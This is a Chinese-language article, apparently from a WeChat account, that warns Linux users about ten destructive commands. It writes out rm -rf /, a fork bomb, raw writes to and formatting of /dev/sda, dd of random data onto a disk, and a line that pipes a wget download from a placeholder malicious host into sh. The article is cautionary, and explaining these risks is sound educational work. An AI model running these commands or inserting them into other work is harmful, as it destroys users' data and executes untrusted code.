Linux 命令行佷有用、很高效,也很有趣,但有時(shí)候也很危險(xiǎn),尤其是在你不確定自己正在做什么時(shí)候。這篇文章將會(huì)向你介紹十條命令,但你最好不要“嘗試”著去使用。
當(dāng)然,以下命令通常都是在 root 權(quán)限下才能將愚蠢發(fā)揮到無可救藥;在普通用戶身份下,破壞的只是自己的一畝三分地。
1. rm -rf 命令
rm -rf 命令是刪除文件夾及其內(nèi)容最快的方式之一。
僅僅一丁點(diǎn)的敲錯(cuò)或無知都可能導(dǎo)致不可恢復(fù)的系統(tǒng)崩壞。
下列是一些 rm 命令的選項(xiàng):
-
rm命令在 Linux 下通常用來刪除文件。
-
rm -r 命令遞歸的刪除文件夾,甚至是空的文件夾。
-
rm -f 命令能不經(jīng)過詢問直接刪除‘只讀文件’。Linux 下刪除文件并不在乎該文件是否是只讀的,而只是在意其父目錄是否有寫權(quán)限。所以,-f這個(gè)參數(shù)只是表示不必一個(gè)個(gè)刪除確認(rèn),而是一律悄悄刪除。另外,原始的 rm 命令其實(shí)也是沒有刪除提示的,只是一般的發(fā)行版都會(huì)將 rm 通過別名的方式增加-i參數(shù)來要求刪除確認(rèn),而-f則抑制了這個(gè)提示。
-
rm -rf / : 強(qiáng)制刪除根目錄下所有東東。
-
rm -rf * :強(qiáng)制刪除當(dāng)前目錄的所有文件。
-
rm -rf . : 強(qiáng)制刪除當(dāng)前文件夾及其子文件夾。
從現(xiàn)在起,當(dāng)你要執(zhí)行 rm -rf 命令時(shí)請留心一點(diǎn)。我們可以在“.bashrc”文件對‘rm‘命令創(chuàng)建 rm -i 的別名,來預(yù)防用‘rm‘命令刪除文件時(shí)的事故,它會(huì)要求你確認(rèn)每一個(gè)刪除請求。
譯注:大多數(shù)發(fā)行版已經(jīng)這樣做了,如果還沒有,請這樣做,并在使用-f參數(shù)前一定考慮好你在做什么!譯者本人有著血淚的教訓(xùn)啊。
2. :() { :|:& };:命令
這就是個(gè) fork 炸彈的實(shí)例。
具體操作是通過定義一個(gè)名為‘:‘的函數(shù),它會(huì)調(diào)用自己兩次,一次在前臺(tái)另一次運(yùn)行在后臺(tái)。它會(huì)反復(fù)的執(zhí)行下去直到系統(tǒng)崩潰。
#mv/home/user/*/dev/null
3. 命令> /dev/sda
這個(gè)命令會(huì)將某個(gè)‘命令‘的輸出寫到塊設(shè)備/dev/sda中。
該操作會(huì)將在塊設(shè)備中的所有數(shù)據(jù)塊替換為命令寫入的原始數(shù)據(jù),從而導(dǎo)致整個(gè)塊設(shè)備的數(shù)據(jù)丟失。
4. mv 文件夾 /dev/null
這個(gè)命令會(huì)移動(dòng)某個(gè)‘文件夾‘到/dev/null。
在 Linux 中 /dev/null 或 null 設(shè)備是一個(gè)特殊的文件,所有寫入它的數(shù)據(jù)都會(huì)被清除,然后返回寫操作成功。
當(dāng)然,要說明的是這個(gè)命令并不能阻止數(shù)據(jù)恢復(fù)軟件——所以,真正的徹底毀滅,需要采用專用的軟件或者手法來完成。
5. wget http://malicious_source -O- | sh
該命令會(huì)從一個(gè)(也許是)惡意源下載一個(gè)腳本并執(zhí)行。
Wget 命令會(huì)下載這個(gè)腳本,而 sh 會(huì)(無條件的)執(zhí)行下載下來的腳本。
注意: 你應(yīng)該時(shí)刻注意你下載包或腳本的源。只能使用那些從可信任的源中下載腳本/程序。
6. mkfs.ext3 /dev/sda
上列命令會(huì)格式化塊設(shè)備‘sda’,在執(zhí)行這個(gè)命令后你的塊設(shè)備(硬盤驅(qū)動(dòng)器)會(huì)被格式化,直接讓你的系統(tǒng)達(dá)到不可恢復(fù)的階段。
通常我們不會(huì)直接使用/dev/sda這樣的設(shè)備,除非是作為 raw 設(shè)備使用。
一般都需要將 sda 分成類似 sda1、sda2 這樣的分區(qū)后才使用。當(dāng)然,無論你使用 sda 還是 sda1,這樣對塊設(shè)備或分區(qū)進(jìn)行 mkfs 都是毀滅性的,上面的數(shù)據(jù)都會(huì)被蒸發(fā)了。
7. > file
這個(gè)命令常用來清空文件內(nèi)容或記錄命令輸出。
不過請?jiān)趫?zhí)行前,確認(rèn)輸出的文件是空的或者還不存在,否則原來的文件可真是恢復(fù)不了了——連數(shù)據(jù)恢復(fù)軟件都未必能幫助你了。
你可能真正想用的是“>>”,即累加新的輸出到文件,而不是刷新那個(gè)文件。
如果用上列執(zhí)行時(shí)輸入錯(cuò)誤或無知的輸入類似 “> xt.conf”的命令會(huì)覆蓋配置文件或其他任何的系統(tǒng)配置文件。
8. ^foo^bar
這個(gè)命令用來編輯先前運(yùn)行的命令而無需重打整個(gè)命令。
用 foobar 命令時(shí)如果你沒有徹底檢查改變原始命令的風(fēng)險(xiǎn),這可能導(dǎo)致真正的麻煩。
9. dd if=/dev/random of=/dev/sda
這個(gè)命令會(huì)向塊設(shè)備 sda 寫入隨機(jī)的垃圾文件從而擦出數(shù)據(jù),讓你的系統(tǒng)可能陷入混亂和不可恢復(fù)的狀態(tài)。
記得上面說過 mv 到黑洞并不能徹底刪除數(shù)據(jù)么?那么這個(gè)命令就是給了你一個(gè)徹底刪除的方法!當(dāng)然為了保險(xiǎn)起見,你可以覆寫多次。
10. 隱藏命令
下面的命令其實(shí)就是上面第一個(gè)命令 (rm -rf)。
這里的代碼是隱藏在十六進(jìn)制里的,一個(gè)無知的用戶可能就會(huì)被愚弄,如果在終端里運(yùn)行下面命令可能會(huì)擦除你的根分區(qū)。
真正的危險(xiǎn)是隱藏起來的,不會(huì)被輕易的檢測到。你必須時(shí)刻留心你在做什么結(jié)果會(huì)怎樣。
切記,千萬不要編譯/運(yùn)行從未知來源的代碼。
今天給大家?guī)淼氖莻€(gè)命令到這里就結(jié)束了啦,請千萬記住不要再服務(wù)器或者其他設(shè)備上隨意“嘗試“~
如果你想測試它們,請?jiān)谔摂M機(jī)上運(yùn)行,不然文件丟失或者系統(tǒng)奔潰就不好了。
審核編輯 :李倩
-
Linux
+關(guān)注
關(guān)注
87文章
11329瀏覽量
209969 -
函數(shù)
+關(guān)注
關(guān)注
3文章
4344瀏覽量
62810 -
root
+關(guān)注
關(guān)注
1文章
86瀏覽量
21403
原文標(biāo)題:危險(xiǎn)!這10個(gè)Linux命令慎用,否則可能牢底坐穿!
文章出處:【微信號(hào):網(wǎng)絡(luò)工程師筆記,微信公眾號(hào):網(wǎng)絡(luò)工程師筆記】歡迎添加關(guān)注!文章轉(zhuǎn)載請注明出處。
發(fā)布評論請先 登錄
相關(guān)推薦
評論